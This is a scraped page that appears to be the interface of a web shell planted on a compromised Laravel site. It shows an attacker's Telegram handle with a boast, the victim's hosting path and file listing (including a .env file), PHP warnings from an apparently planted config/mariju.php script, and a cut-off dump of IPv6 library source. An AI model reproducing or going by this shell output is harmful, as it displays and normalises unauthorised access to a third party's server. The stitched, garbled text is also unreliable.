telegram : @iamdarkcomedy i am hacker

path :/home/bisorgosof24/public_html/Backup23122024

upload file:

List of files:

name file size edit permission action
.env2733 KBDecember 22 2024 06:20:070644
404.html58370 KBNovember 20 2024 15:32:220644
502.html58368 KBNovember 20 2024 15:32:220644
Modules-December 11 2024 21:02:560755
README.md4158 KBFebruary 14 2023 12:31:560644
app-December 11 2024 17:57:480755
artisan1686 KBFebruary 14 2023 12:31:560644
bootstrap-December 11 2024 20:23:360755
composer.json3761 KBDecember 11 2024 22:15:000644
composer.lock512048 KBDecember 11 2024 22:13:280644
config-June 15 2025 02:09:360755
database-December 05 2024 20:18:120755
dfsdf dfds fd fds findex.html1420 KBNovember 20 2024 15:32:240644
error_log22303346 KBJuly 18 2025 22:23:380644
firoz-December 23 2024 13:24:460755
index.php1667 KBDecember 14 2024 05:20:360644
lang-December 11 2024 21:02:480755
modules_statuses.json472 KBNovember 20 2024 15:32:240644
mpos-March 31 2025 02:36:310755
package.json226 KBFebruary 14 2023 12:31:560644
phpunit.xml1146 KBFebruary 14 2023 12:31:560644
public-March 31 2025 02:36:310755
resources-December 11 2024 21:10:220755
routes-June 15 2025 02:09:310755
storage-December 11 2024 21:12:440755
tests-December 05 2024 20:18:120755
vendor-December 11 2024 22:13:300755
vite.config.js263 KBFebruary 14 2023 12:31:560644

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 227

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 228

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 229

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 230
* * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ declare(strict_types=1); namespace League\Uri\IPv6; use Stringable; use ValueError; use function filter_var; use function implode; use function inet_pton; use function str_split; use function strtolower; use function unpack; use const FILTER_FLAG_IPV6; use const FILTER_VALIDATE_IP; final class Converter { /** * Significant 10 bits of IP to detect Zone ID regular expression pattern. * * @var string */ private const HOST_ADDRESS_BLOCK = "\xfe\x80"; public static function compressIp(string $ipAddress): string { return match (filter_var($ipAddress, FILTER_VALIDATE_IP, FILTER_FLAG_IPV6)) { false => throw new ValueError('The submitted IP is not a valid IPv6 address.'), default => strtolower((string) inet_ntop((string) inet_pton($ipAddress))), }; } public static function expandIp(string $ipAddress): string { if (false === filter_var($ipAddress, FILTER_VALIDATE_IP, FILTER_FLAG_IPV6)) { throw new ValueError('The submitted IP is not a valid IPv6 address.'); } $hex = (array) unpack('H*hex', (string) inet_pton($ipAddress)); return implode(':', str_split(strtolower($hex['hex'] ?? ''), 4)); } public static function compress(Stringable|string|null $host): ?string { $components = self::parse($host); if (null === $components['ipAddress']) { return match ($host) { null => $host, default => (string) $host, }; } $components['ipAddress'] = self::compressIp($components['ipAddress']); return self::build($components); } public static function expand(Stringable|string|null $host): ?string { $components = self::parse($host); if (null === $components['ipAddress']) { return match ($host) { null => $host, default => (string) $host, }; } $components['ipAddress'] = self::expandIp($components['ipAddress']); return self::build($components); } private static function build(array $components): string { $components['ipAddress'] ??= null; $components['zoneIdentifier'] ??= null; if (null === $components['ipAddress']) { return ''; } return '['.$components['ipAddress'].match ($components['zoneIdentifier']) { null => '', default => '%'.$components['zoneIdentifier'], }.']'; } /**] * @param Stringable|string|null $host * * @return array{ipAddress:string|null, zoneIdentifier:string|null} */ private static function parse(Stringable|string|null $host): array { if (null === $host) { return ['ipAddress' => null, 'zoneIdentifier' => null]; } $host = (string) $host; if ('' === $host) { return ['ipAddress' => null, 'zoneIdentifier' => null]; } if (!str_starts_with($host, '[')) { return ['ipAddress' => null, 'zoneIdentifier' => null]; } if (!str_ends_with($host, ']')) { return ['ipAddress' => null, 'zoneIdentifier' => null]; } [$ipv6, $zoneIdentifier] = explode('%', substr($host, 1, -1), 2) + [1 => null]; if (false === filter_var($ipv6, FILTER_VALIDATE_IP, FILTER_FLAG_IPV6)) { return ['ipAddress' => null, 'zoneIdentifier' => null]; } return match (true) { null === $zoneIdentifier, is_string($ipv6) && str_starts_with((string)inet_pton($ipv6), self::HOST_ADDRESS_BLOCK) => ['ipAddress' => $ipv6, 'zoneIdentifier' => $zoneIdentifier], default => ['ipAddress' => null, 'zoneIdentifier' => null], }; } }